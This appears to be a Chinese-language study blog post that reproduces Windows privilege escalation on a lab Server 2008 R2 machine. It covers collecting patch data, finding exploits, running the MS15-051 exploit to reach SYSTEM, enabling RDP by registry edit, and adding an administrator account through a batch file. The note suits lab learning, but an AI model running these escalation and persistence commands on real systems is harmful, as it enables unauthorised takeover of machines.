Windows提权理解及复现

Dawndddddd2026-02-01 11:45

概念理解

Windows有很多本地用户组,管理本地计算机或访问本地资源的权限

只要用户账户加入到这些本地组内,这回用户账户也将具备该组所拥有的权限。

管理员组(Administrators)、高权限用户组(PowerUsers)、普通用户组(Users)、备份操作组(Backup Operators)、文件复制组(Replicator)、来宾用户组(Guests),身份验证用户组(Ahthenticated users)

SYSTEM(系统)、Trustedinstaller(信任程序模块)、Everyone(所有人)、CREATOR OWNER(创建者)等,这些特殊成员不被任何内置用户组吸纳,属于完全独立出来的账户。

真正拥有""完全访问权""的只有一个成员:SYSTEM。这个成员是系统产生的,真正拥有整台计算机管理权限的账户,一般的操作是无法获取与它等价的权限的。

widows常用命令

Win server虚拟机案例复现

Windows server2008 r2 x64(手动提权)

手工提权缺点:自己找的EXP可能不能使用(实验环境不匹配等原因)

先拿哥斯拉生成asp后门

假设提前获取web权限

信息收集

查看版本,当前的权限,靶机的当前进程

筛选EXP

Windowsvulnscan
复制代码 
function Get-CollectKB(){
    # 1. 搜集所有的KB补丁
    $KBArray = @()
    $KBArray = Get-HotFix|ForEach-Object {$_.HotFixId}
    $test = $KBArray|ConvertTo-Json
    return $test
}
function Get-BasicInfo(){
    # 1. 操作系统
    # $windowsProductName = (Get-ComputerInfo).WindowsProductName
    $windowsProductName = (Get-CimInstance Win32_OperatingSystem).Caption
    # 2. 操作系统版本
    $windowsVersion = (Get-ComputerInfo).WindowsVersion
    $basicInfo = "{""windowsProductName"":""$windowsProductName"",""windowsVersion"":""$windowsVersion""}"
    return $basicInfo
    
}
$basicInfo = Get-BasicInfo
$KBList = Get-CollectKB
$KBResult = "{""basicInfo"":$basicInfo,""KBList"":$KBList}"
$KBResult|Out-File KB.json -encoding utf8

哥斯拉上不能在靶机上执行power shell

在系统中直接执行,没python,拉进去,不适配,下午来看看

查了几种python .exe执行文件方法

依赖的 DLL 文件缺失

当你安装 Python 时,它会:

  • 向系统注册一些 COM 组件
  • 安装 VC++ 运行时库
  • 创建注册表项
  • 设置环境变量

架构和系统不匹配

wesng-master
使用(感觉一般)

将systeminfo中的信息复制到项目目录中 systeminfo.txt

复制代码 
python wes.py systeminfo.txt -o vulns.csv
在线网站

Https://i.hacking8.com/tiquan

不能用了好像

https://www.adminxe.com/win-exp/

这个勉勉强强,能搜不能用?

https://www.shentoushi.top/av/kb

这个好像还行,能查出来对应的GitHub资源,卡得上不去,一会再试

https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS15-051

上传EXP之后调用执行(ms15-051)

MS15-051简介 Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。 攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 远程或匿名用户无法利用此漏洞。

利用exp,通过执行命令

复制代码 
C:/Users/ms15-051.exe "whoami"

成功提权至system权限&&探测是否开启3389端口,开启3389端口

复制代码 
C:/Users/ms15-051.exe "netstat -ano"

哥斯拉网络扫描也可以/

上传bat脚本开启3389端口

复制代码 
%3389.bat%
%开启3389端口%
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
%关闭3389端口%
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f


  C:/Users/ms15-051.exe "C:/Users/3389.bat"

使用system权限创建一个administrator组中的用户,进行远程登录

复制代码 
%add_user.bat%
net user whgojp Wh12345 /add
net localgroup administrators wh /add
net localgroup administrators
del add_user.bat

https://www.exploit-db.com/

Windows server2012 x64(MSF全自动)(使用phpstudy搭建)

MSF自动化

相关推荐
wuhui21003 天前
宿主机与虚拟机网络配置打通
网络·kali·虚拟机
supersolon4 天前
PVE通过命令删除爱快虚拟机
服务器·虚拟机·pve·ikuai·爱快
好名字更能让你们记住我4 天前
vmware虚拟机安装Windows10镜像【超详细图文版】!!!
windows·系统安装·vmware·虚拟机·图文教程
ckm紫韵6 天前
VMware新建虚拟机教程
vmware·虚拟机
Roselind_Yi7 天前
云计算实验实操|Keystone安装配置+CloudSim仿真平台部署(超详细图文版)
java·经验分享·笔记·ubuntu·云计算·vim·虚拟机
supersolon9 天前
PVE 部署 iStoreOS 软路由完整教程(避坑版)
虚拟机·pve·openwrt·软路由·istoreos
虚伪的空想家9 天前
未能启动虚拟机xxx.vmx
vmware·虚拟机
养乐多q.♡10 天前
AIMaLinux系统上通过KVM创建了windows10系统,在windows10系统中通过NFS分享文件夹到内网上可以挂载
虚拟机·kvm·nfs挂载·aimalinux
新手886015 天前
Oracle VirtualBox虚拟机安装 和 安装 window11版本虚拟机 及 启用EFI和硬盘无法使用 问题
服务器·windows·计算机网络·安全·虚拟机
庞轩px15 天前
HotSpot详解——符号引用、句柄池、直接指针的终极解密
java·jvm·设计模式·内存·虚拟机·引用·klass
热门推荐
01GitHub 镜像站点02OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程03Qwen3.5-Omni与Qwen3.6模型全面解析(含测评/案例/使用教程)04VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)05【技术干货】Gemma 4 上手深度指南:本地多模态大模型的新基线06最新更新版本,OpenClaw v2026.4.2 深度解读剖析:Task Flow 重磅回归与安全架构的全面硬化07AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南08Claude Code 未登录 使用第三方模型09纯 HTML/CSS/JS 实现的高颜值登录页,还会眨眼睛!少女心爆棚!10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)